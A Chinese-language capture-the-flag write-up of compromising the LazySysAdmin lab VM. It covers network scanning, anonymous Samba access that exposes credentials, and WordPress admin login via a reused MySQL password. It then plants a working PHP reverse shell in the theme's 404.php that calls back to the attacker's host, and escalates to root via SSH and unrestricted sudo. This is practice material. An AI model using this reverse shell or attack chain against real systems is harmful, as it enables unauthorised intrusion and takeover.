Lazy 靶机渗透

• Lazy靶机渗透
  • 1. 渗透过程
  • 2. 重要信息

Lazy靶机渗透

1. 渗透过程

• 话不多少说开始搜集信息：

• 这里使用 netdiscover : netdiscover -i eth0 -r 192.168.0.0/24

• 发现一条

  192.168.0.110   00:0c:29:b8:5f:5f      1      60  VMware, Inc.
  

• 使用nmap进一步探测端口 nmap -sS 192.168.0.110 -oN /tmp/r.txt

• 扫描结果

  Host is up (0.00022s latency).
  Not shown: 994 closed ports
  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  139/tcp  open  netbios-ssn
  445/tcp  open  microsoft-ds
  3306/tcp open  mysql
  6667/tcp open  irc
  MAC Address: 00:0C:29:B8:5F:5F (VMware)
  #后来用 nmap -v -A 192.168.0.110 扫面出
  139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
  

• 80肯定是web，139和445都是Samba

• 我们先用nikto 扫面一下web，再试试Samba能不能连接

• nikto -host http://192.168.0.110/ -o /tmp/r.html

• 我用kali里面的连接网络文件夹输入 smb://192.168.0.110

• 发现有两个文件夹一个是 $print 另一个是 $share 发现第一个需要密码，第二个可以匿名访问

• 进去看看，都是一代码

• 还找到一个文件 deets.txt 内容是

  CBF Remembering all these passwords.
  
  Remember to remove this file and update your password after we push out the server.
  
  Password 12345
  
  CBF记住所有这些密码。
  请记住在我们推出服务器后删除此文件并更新您的密码。
  密码12345
  

• 发现一个服务器默认的密码 12345

• 这时候我们在看nikto扫描的结果：

• 发现网站是wordpress框架，还有phpmyadmin的地址…

• 进到wordpress之后发现只有一篇文章，都是这句话My name is togie.

• 这可能是某个用户名

• 这些相关的目录在$share都有那我们直接找wordpress的后台地址：wp-admin

• 还在 wp-config.php找到了mysql的账号密码 Admin ：TogieMYSQL12345^^

• 而且nikto还扫描到 phpmyadmin的地址，登进去看看，发现没有select权限，

• 那我们进去wp-admin看看也需要密码，咋办没密码呀，数据库也进不去，那就试试mysql的密码吧

• 发现mysql的密码竟然和 wordpress的账号密码是一样

• 进后台之后，查到可以修改主题的源代码，那我们就修改404.php 给了一个反弹shell的代码：

  <?php
      set_time_limit(0);
      $ip='192.168.0.21';
      $port='20096';
      $fp=@fsockopen($ip,$port,$errno,$errstr);
      if(!$fp){ echo "error";}
      else{
      	fputs($fp,"\nconnect success\n");
      	while (!feof($fp)) {
      		fputs($fp,"shell:");
      		$shell=fgets($fp);
      		$message=`$shell`;
      		fputs($fp,$message);
      	}
      	fclose($fp);
      }
      ?>
  

• 然后nc监听一下，激活主题并且访问一个不存在的帖子

• http://192.168.0.110/wordpress/?p=-1

• nc就弹回一个 www-dada 的shell

• 然后我们查看 /etc/passwd文件发现

  togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
  

• 哈？这不就是之前说的那个可能的用户名嘛

• 然后服务器默认的密码 12345，那我们试试ssh能不能给他连上了

• kali输入命令 ： ssh togie@192.168.0.110给我来一一段这样的话？

  #############################################################################
  #              			Welcome to Web_TR1                                  #
  #            All connections are monitored and recorded                     #    
  #          Disconnect IMMEDIATELY if you are not an authorized user!        #     
  #############################################################################
  togie@192.168.0.110's password:
  
  1. 欢迎使用Web目录1
  2. 所有连接都被监视和记录
  3. 如果您不是授权用户，请立即断开连接！
  

• 哈？ 吓我呢？

• 试试密码，进去了，哈哈哈~

• 走一下三部曲

• ls -al ~/

• 发现没啥

• crontab -l

• 也没啥

• history

• 也没啥~

• 然后我加一个第四部曲

• sudo -l

  User togie may run the following commands on LazySysAdmin:
      (ALL : ALL) ALL
  用户togie可以在lazysadmin上运行以下命令：
  (全部：全部)全部
  

• 那还说什么 直接就是root权限了

• 直接 sudo passwd root

• root不就来了嘛

• root用户下看到一个 proof.txt

• 内容是：

  WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
  
  
  Well done :)
  
  Hope you learn't a few things along the way.
  
  Regards,
  
  Togie Mcdogie
  
  Enjoy some random strings
  
  WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
  2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
  pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
  bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
  

• WELL_DONE!!!

2. 重要信息

# 1. phpmyadmin地址
http://192.168.0.110/phpmyadmin/
# 2. wordpress管理后台
http://192.168.0.110/wordpress/wp-admin
# 3. mysql账号密码：
Admin ：TogieMYSQL12345^^ (也是wordpress管理后台的账号密码)
# 4. ssh账号密码：
togie ：12345